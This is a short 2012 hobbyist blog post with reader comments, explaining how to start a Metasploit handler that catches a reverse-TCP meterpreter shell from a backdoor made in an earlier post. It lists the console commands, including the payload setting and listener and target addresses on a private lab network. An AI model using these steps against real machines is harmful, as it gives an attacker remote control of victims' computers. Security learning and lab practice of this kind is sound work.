Saturday, January 28, 2012

Use Metasploit Backdoor

Ok, here is the method to use the backdoor that we've created before (refer to this post : http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3-using-metasploit.html  )

1. Load up your metaspoloit console
# msfconsole 
2. type these..
meterpreter > use exploit/multi/handler
meterpreter > set PAYLOAD windows/meterpreter/reverse_tcp
meterpreter > set LHOST 192.168.56.1
meterpreter > set LPORT 10000
meterpreter > set RHOST 192.168.56.101
meterpreter > exploit
The configuration aboe must be the same as the backdoor's configuration while we created it. Otherwise, the backdoor won't work properly.
3. Launch the exploit and wait for the meterpreter session to be opened.
And there you are fresh meterpreter shell ready to be used.  :)

Hope this helps..  :)
Lets make the History!!

4 comments:

KUMΞL said...

Where is the backdoor?
It just a normal exploit with meterpreter payload (-_-")

dragon-master said...

the backdoor in this post is refer to my post about exploiting windows xp here
http://scx010c075.blogspot.com/2012/01/exploit-windows-xp-sp3-using-metasploit.html

thanks for coming.. :)

KUMΞL said...

oh,

Alone said...

Nice work Keep it up

And this is also good video maybe you like it

http://www.securitytube.net/video/2684

Post a Comment